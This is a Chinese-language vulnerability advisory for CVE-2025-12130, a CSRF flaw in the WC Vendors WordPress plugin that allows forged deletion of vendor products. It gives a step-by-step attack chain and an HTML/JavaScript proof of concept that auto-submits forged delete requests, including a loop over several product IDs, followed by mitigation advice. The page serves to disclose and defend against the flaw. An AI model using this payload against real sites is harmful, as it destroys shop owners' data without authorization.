CVE-2025-12130 WC Vendors插件CSRF漏洞可删除供应商产品

漏洞信息

漏洞编号

CVE-2025-12130

漏洞类型

CSRF (跨站请求伪造)

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

WC Vendors – WooCommerce Multivendor, WooCommerce Marketplace, Product Vendors plugin for WordPress

漏洞概述

CVE-2025-12130是WordPress WC Vendors插件中的一个跨站请求伪造（CSRF）安全漏洞。该插件是WooCommerce生态中广受欢迎的多供应商商城解决方案，允许供应商在WooCommerce平台上管理自己的产品。漏洞存在于插件的 /vendor_dashboard/product/delete/ 端点，由于缺少或错误地实现了CSRF令牌（nonce）验证机制，导致攻击者可以构造恶意请求诱骗已登录的管理员或供应商执行未经授权的产品删除操作。攻击者可以通过社会工程学手段，如钓鱼邮件、恶意链接等方式，诱导目标用户点击包含恶意请求的页面。一旦用户点击，攻击者即可在用户不知情的情况下删除该供应商账户下的所有产品，造成业务中断和数据丢失。由于该漏洞不需要攻击者进行身份认证（PR:N），且攻击成功率依赖于用户交互（UI:R），CVSS评分为4.3，属于中等严重程度。漏洞影响范围涵盖插件所有2.6.4及以前版本，建议用户立即更新至最新版本以修复此安全问题。

技术细节

该CSRF漏洞的根本原因在于WordPress插件开发过程中对用户操作安全验证的疏忽。在正常的WordPress安全实践中，涉及状态变更的操作（如创建、更新、删除资源）应当使用wp_verify_nonce()函数验证请求来源的有效性。然而，WC Vendors插件在处理vendor_dashboard/product/delete/端点的DELETE请求时，未正确实现nonce验证或验证逻辑存在缺陷。具体来说，当供应商或管理员尝试删除产品时，服务器端应首先检查请求中携带的security参数是否与服务器端存储的nonce值匹配，以确认请求确实来自网站的合法操作界面。攻击者利用此漏洞的方式是：构造一个包含产品删除命令的HTML表单或JavaScript请求，并诱使已登录的供应商/管理员访问。由于浏览器在访问恶意站点时会自动携带目标网站的cookies，服务器会误认为这是来自合法用户的操作请求。攻击者可指定要删除的产品ID，服务器在验证会话有效后即执行删除操作，无需验证请求的真实性来源。此攻击成功的关键在于攻击者必须知道目标网站上存在的产品ID范围，这通常通过枚举或猜测即可实现。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者通过扫描或猜测确定目标网站使用的WC Vendors插件版本，判断是否在受影响范围内（<=2.6.4），并收集目标供应商的产品ID信息

STEP 2

步骤2: 构造恶意请求

攻击者创建包含产品删除命令的HTML页面或JavaScript代码，构造针对/vendor_dashboard/product/delete/端点的POST请求，绕过缺失的nonce验证

STEP 3

步骤3: 社会工程攻击

攻击者通过钓鱼邮件、即时消息、社交媒体等方式向目标供应商或管理员发送包含恶意链接的内容，诱导其点击访问

STEP 4

步骤4: 请求执行

目标用户访问恶意页面后，浏览器自动携带有效的认证cookies向目标站点发送删除请求，服务器误认为这是合法用户操作

STEP 5

步骤5: 产品删除

服务器执行产品删除操作，目标供应商的产品被永久删除，造成数据丢失和业务中断

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CSRF PoC for CVE-2025-12130 - Delete Vendor Products -->
<!-- This PoC demonstrates how an attacker can force a logged-in vendor to delete products -->
<!DOCTYPE html>
<html>
<head>
    <title>Product Deletion Request</title>
</head>
<body>
    <h1>Please wait...</h1>
    
    <!-- Method 1: Auto-submit form -->
    <form id="csrfForm" action="https://target-site.com/vendor_dashboard/product/delete/" method="POST">
        <!-- Product ID to delete - attacker can modify this -->
        <input type="hidden" name="product_id" value="123">
        <!-- Missing or bypassed nonce validation -->
        <input type="hidden" name="_wpnonce" value="any_value">
        <input type="hidden" name="action" value="delete">
    </form>
    
    <script>
        // Auto-submit the form when page loads
        document.getElementById('csrfForm').submit();
    </script>
    
    <!-- Method 2: Using fetch API for multiple deletions -->
    <script>
        // Example: Delete multiple products
        const productIds = [100, 101, 102, 103, 104];
        
        async function deleteProducts() {
            for (const productId of productIds) {
                await fetch('/vendor_dashboard/product/delete/', {
                    method: 'POST',
                    credentials: 'include', // Include cookies
                    headers: {
                        'Content-Type': 'application/x-www-form-urlencoded',
                    },
                    body: `product_id=${productId}&action=delete&_wpnonce=any_value`
                });
            }
            console.log('Products deleted');
        }
        
        // Uncomment to execute
        // deleteProducts();
    </script>
    
    <!-- Method 3: Image-based request (no user interaction) -->
    <img src="https://target-site.com/vendor_dashboard/product/delete/?product_id=123&action=delete" 
         style="display:none" onerror="this.parentElement.innerHTML='Error'" />
</body>
</html>

<!-- Attack Scenario:
1. Attacker creates this HTML page
2. Lures a logged-in vendor/admin to visit the page
3. The victim's browser automatically sends the request with valid session cookies
4. Server processes the request without proper CSRF validation
5. Specified product(s) are deleted
-->

影响范围

WC Vendors plugin <= 2.6.4

防御指南

临时缓解措施

如果无法立即更新插件，可采取以下临时缓解措施：1) 在Web应用防火墙(WAF)中配置规则，拦截对/vendor_dashboard/product/delete/端点的异常请求；2) 限制供应商删除产品的权限，改为需要二次确认的操作流程；3) 启用双因素认证增加攻击难度；4) 监控服务器日志，及时发现异常的产品删除行为；5) 定期备份产品数据以便快速恢复。但这些措施不能完全替代升级补丁，建议尽快更新到官方修复版本。